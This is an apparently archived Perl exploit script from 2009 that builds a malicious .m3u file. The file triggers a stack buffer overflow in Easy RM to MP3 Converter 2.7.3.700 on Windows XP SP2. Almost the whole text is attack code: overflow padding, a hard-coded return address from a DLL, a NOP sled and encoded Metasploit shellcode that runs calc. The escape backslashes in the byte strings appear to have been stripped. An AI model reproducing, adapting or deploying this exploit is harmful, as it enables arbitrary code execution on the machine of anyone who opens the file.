easyrmmp3-overflow.txt
Posted on 17 July 2009
#!/usr/bin/perl # Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit # Author: Crazy_Hacker # Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe # Tested : Windows XP SP2 (En) # Greetz : Thugz_Hacker,Syrian Hacker,Golden_z3ro,Managerplay # Home : www.sec-t.com # viva Xhackers Team ;) # welcome back Milw0rm print " ################################################## "; print "Exploit By : Crazy_Hacker "; print "Vurnable Pro : Easy RM to MP3 Converter 2.7.3.700 "; print "Tested on : Windows XP SP2 (En) "; print "Description : Stack Local Buffer Oveflow "; print "File type : .m3u "; print "################################################## "; $junk = "x41" x 26061; $ret = "x0Fx3FxA1x01"; # => Universal Address (MSRMCcodec02.dll) $nopsled = "x90" x 20; # windows/exec - 144 bytes thanks to metasploit Encoder: x86/shikata_ga_nai EXITFUNC=seh, CMD=calc $shellcode = "xdbxdfxbdxe4x47x45x20xd9x74x24xf4x5fx33xc9" . "xb1x1ex83xefxfcx31x6fx14x03x6fxf0xa5xb0xdc" . "x10x6dx3bx1dxe0xe5x7ex21x6bx85x85x21x6ax99" . "x0dx9ex74xeex4dx01x85x1bx38xcaxb1x50xbax22" . "x88xa6x24x16x6exe6x23x60xafx2dxc6x6fxedx59" . "x2dx54xa5xb9xcaxdexa0x49x8dx04x2bxa5x54xce" . "x27x72x12x8fx2bx85xcfxbbx4fx0ex0ex57xe6x4c" . "x35xa3x3bx33x04x5dxdbx9ax02x2ax5dx13x40x6c" . "x6dxd8x26x71xc0x55xaex81x93x92xacx52xc9x32" . "xdbxa2x87xb7x44x2bx0fx49xf0xa5x78x49xe2xd9" . "xe7xd9x8ex1d"; $exploit = $junk.$ret.$nopsled.$shellcode; print " [+] Creating Exploit File ... "; open($cc ,">Exploit.m3u"); print $cc $exploit; close($cc); print "[+] Exploit File Created (Exploit.m3u) ";
